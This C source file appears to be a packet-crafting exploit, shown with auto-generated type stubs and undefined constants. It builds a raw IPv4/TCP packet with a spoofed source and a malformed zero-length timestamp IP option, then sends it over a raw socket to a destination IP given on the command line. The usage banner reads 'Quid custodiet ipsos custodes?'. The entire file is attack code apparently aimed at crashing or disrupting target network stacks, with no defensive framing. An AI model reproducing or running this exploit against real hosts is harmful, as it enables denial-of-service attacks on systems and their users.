
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct tcphdr {int th_dport; int th_seq; int th_ack; int th_off; int th_flags; int th_sum; void* th_win; void* th_sport; } ;
struct TYPE_2__ {int s_addr; } ;
struct ip {int ip_v; int ip_hl; int ip_tos; int ip_off; int ip_ttl; TYPE_1__ ip_dst; TYPE_1__ ip_src; scalar_t__ ip_sum; scalar_t__ ip_p; void* ip_id; void* ip_len; } ;


 scalar_t__ IPPROTO_TCP ;
 int IP_SZ ;
 int LEN ;
 int OPTSIZE ;
 int PAYLOAD_LEN ;
 int SRC_IP ;
 int TCP_SZ ;
 int TH_ACK ;
 int TH_PUSH ;
 unsigned long htonl (int) ;
 void* htons (int) ;
 int inet_addr (char*) ;
 char* inet_ntoa (TYPE_1__) ;
 unsigned char* malloc (int) ;
 int memcpy (void*,void*,int) ;
 int memset (unsigned char*,int,int) ;
 int ntohs (scalar_t__) ;
 void perror (char*) ;
 int printf (char*,...) ;

void main(int argc, char *argv[])
{
  int checksum(unsigned short *, int);
  int raw_socket(void);
  int write_raw(int, unsigned char *, int);
  unsigned long option = htonl(0x44000001);
  unsigned char *p;
  int s, c;
  struct ip *ip;
  struct tcphdr *tcp;

  if (argc != 2) {
    printf("Quid custodiet ipsos custodes?\n");
    printf("Usage: %s <destination IP>\n", argv[0]);
    return;
  }

  p = malloc(1500);
  memset(p, 0x00, 1500);

  if ((s = raw_socket()) < 0)
     return perror("socket");

  ip = (struct ip *) p;
  ip->ip_v = 0x4;
  ip->ip_hl = 0x5 + (OPTSIZE / 4);
  ip->ip_tos = 0x32;
  ip->ip_len = htons(LEN);
  ip->ip_id = htons(0xbeef);
  ip->ip_off = 0x0;
  ip->ip_ttl = 0xff;
  ip->ip_p = IPPROTO_TCP;
  ip->ip_sum = 0;
  ip->ip_src.s_addr = SRC_IP;
  ip->ip_dst.s_addr = inet_addr(argv[1]);



  tcp = (struct tcphdr *) (p + IP_SZ + OPTSIZE);
  tcp->th_sport = htons(80);
  tcp->th_dport = 0xbeef;
  tcp->th_seq = 0x12345678;
  tcp->th_ack = 0x87654321;
  tcp->th_off = 5;
  tcp->th_flags = TH_ACK | TH_PUSH;
  tcp->th_win = htons(8192);
  tcp->th_sum = 0;


  memcpy((void *) (p + IP_SZ), (void *) &option, OPTSIZE);


  c = checksum((unsigned short *) &(ip->ip_src), 8)
     + checksum((unsigned short *) tcp, TCP_SZ + PAYLOAD_LEN)
     + ntohs(IPPROTO_TCP + TCP_SZ);
  while (c >> 16) c = (c & 0xffff) + (c >> 16);
  tcp->th_sum = ~c;

  printf("Sending %s -> ", inet_ntoa(ip->ip_src));
  printf("%s\n", inet_ntoa(ip->ip_dst));

  if (write_raw(s, p, LEN) != LEN)
     perror("sendto");
}
